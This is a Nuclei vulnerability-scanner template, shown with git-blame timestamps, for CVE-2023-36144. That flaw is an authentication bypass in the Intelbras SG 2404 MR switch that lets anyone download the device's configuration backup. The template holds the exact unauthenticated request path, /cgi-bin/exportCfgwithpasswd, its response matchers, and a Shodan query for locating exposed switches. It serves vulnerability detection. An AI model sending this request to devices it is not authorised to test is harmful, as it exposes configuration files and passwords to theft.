nuclei-templates/http/cves/2023/CVE-2023-36144.yaml

53 lines
1.6 KiB
YAML
Raw Normal View History

id: CVE-2023-36144
info:
2023-12-08 07:46:12 +00:00
name: Intelbras Switch - Information Disclosure
author: gy741
severity: high
description: |
An authentication bypass in Intelbras Switch SG 2404 MR in firmware 1.00.54 allows an unauthenticated attacker to download the backup file of the device, exposing critical information about the device configuration.
remediation: |
Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-36144
- https://github.com/leonardobg/CVE-2023-36144
- http://intelbras.com
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-36144
cwe-id: CWE-862
epss-score: 0.04828
epss-percentile: 0.91878
cpe: cpe:2.3:o:intelbras:sg_2404_mr_firmware:1.00.54:*:*:*:*:*:*:*
2023-12-08 07:46:12 +00:00
metadata:
max-request: 1
vendor: intelbras
product: sg_2404_mr_firmware
2023-12-08 07:46:12 +00:00
shodan-query: title:"Intelbras"
tags: cve,cve2023,intelbras,switch,exposure
http:
- method: GET
path:
- '{{BaseURL}}/cgi-bin/exportCfgwithpasswd'
matchers-condition: and
matchers:
- type: word
2023-12-08 07:46:12 +00:00
part: body
words:
- 'System Description'
- 'System Version'
- 'System Name'
condition: and
2023-12-08 07:46:12 +00:00
- type: word
part: header
words:
- 'attachment;filename='
- type: status
status:
- 200
# digest: 4a0a00473045022100f47008d31e4b9f560f74a89a501a37748965949ba22ecb729ba379236832070802204c31a6291e446fb7cf1e63c85de3b83516131b0c9a6a78067f7979183c3efcf3:922c64590222798bb761d5b6d8e72950